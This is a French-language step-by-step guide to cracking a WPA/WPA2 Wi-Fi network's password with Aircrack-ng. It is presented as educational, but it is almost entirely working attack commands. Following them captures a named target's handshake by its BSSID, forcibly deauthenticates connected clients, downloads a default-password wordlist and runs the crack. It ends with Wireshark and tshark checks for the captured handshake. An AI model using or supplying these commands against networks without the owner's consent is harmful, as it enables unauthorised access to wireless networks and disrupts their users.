Guide pour Pirater un Réseau Wi-Fi avec Aircrack-ng

Ce guide explique comment utiliser Aircrack-ng pour pirater un réseau Wi-Fi à des fins éducatives. L'objectif est de comprendre les vulnérabilités des réseaux sans fil pour les sécuriser.

Étapes détaillées pour pirater un réseau Wi-Fi avec Aircrack-ng

1. Pré-requis :

• Un ordinateur sous Linux (Ubuntu de préférence).

• Aircrack-ng installé.

• Si sur windows Un adaptateur Wi-Fi compatible avec le mode monitor ou installer linux directement.

2. Installer Aircrack-ng

• Ouvrez un terminal et tapez :

	sudo apt update
	sudo apt install aircrack-ng

3. Mettre l'adaptateur Wi-Fi en mode monitor

• Listez vos interfaces réseau pour identifier votre interface Wi-Fi :

  sudo iwconfig

• Mettez votre interface Wi-Fi en mode monitor :

	sudo airmon-ng start wlan0

• Remplacez wlan0 par le nom de votre interface Wi-Fi.

4. Capturer les paquets

• Utilisez airodump-ng pour capturer les paquets du réseau cible :

  sudo airodump-ng wlan0mon

Remplacez wlan0mon par votre interface en mode monitor.

• Notez le canal du réseau cible (ELEGOO-681ED5A3C9C8) et son BSSID (C8:C9:A3:D5:1E:69).

• Lancez la capture des paquets :

	sudo airodump-ng -c [channel] --bssid C8:C9:A3:D5:1E:69 -w capture wlan0mon

• Remplacez [channel] par le canal du réseau cible.

5. Déconnexion des clients (optionnel)

• Pour accélérer le processus, vous pouvez déconnecter les clients pour forcer la réauthentification :

  sudo aireplay-ng --deauth 10 -a C8:C9:A3:D5:1E:69 wlan0mon

6. Utiliser Aircrack-ng pour casser le mot de passe

• Téléchargez la liste de mots de passe par défaut :

  wget https://raw.githubusercontent.com/ljamel/defaultpass/master/defaultpass1000.txt -O defaultpass1000.txt

• Utilisez Aircrack-ng pour casser le mot de passe en utilisant le fichier de capture et la liste de mots de passe :

	sudo aircrack-ng -w defaultpass1000.txt -b C8:C9:A3:D5:1E:69 capture-01.cap

7. Analyser les résultats

• Si le mot de passe est trouvé, il sera affiché dans le terminal.

   

Conclusion

En suivant ces étapes, vous pouvez démontrer la vulnérabilité d'un réseau Wi-Fi avec un mot de passe par défaut et apprendre comment renforcer la sécurité de votre propre réseau.

Fichiers à télécharger : (Pour un teste d'exemple)

• Fichier de capture

• Liste de mots de passe par défaut

Depannage (Analyse Manuelle)

Vous pouvez également analyser le fichier de capture manuellement en utilisant Wireshark, un outil graphique qui permet d'inspecter les paquets capturés. Voici comment procéder :

1. Ouvrez Wireshark : Si vous ne l'avez pas installé, vous pouvez l'installer en utilisant :

   sudo apt install wireshark

• Ouvrez le fichier de capture : Chargez le fichier psk-08.cap-01.cap dans Wireshark.

• Filtrer les paquets EAPOL : Utilisez le filtre suivant pour afficher uniquement les paquets EAPOL (Extensible Authentication Protocol over LAN) :

3. eapol

4. Vérifiez la présence des handshakes : Vous devriez voir au moins quatre paquets EAPOL. Les paquets typiques d'un handshake WPA/WPA2 sont :

   • 1er paquet : EAPOL Key (Message 1)

   • 2ème paquet : EAPOL Key (Message 2)

   • 3ème paquet : EAPOL Key (Message 3)

   • 4ème paquet : EAPOL Key (Message 4)

Utilisation de TShark

Vous pouvez aussi utiliser tshark, la version en ligne de commande de Wireshark, pour vérifier la présence de handshakes :

tshark -r psk-08.cap-01.cap -Y eapol

Cette commande affichera tous les paquets EAPOL dans le fichier de capture. Vous pouvez compter les messages pour vérifier la présence d'un handshake complet.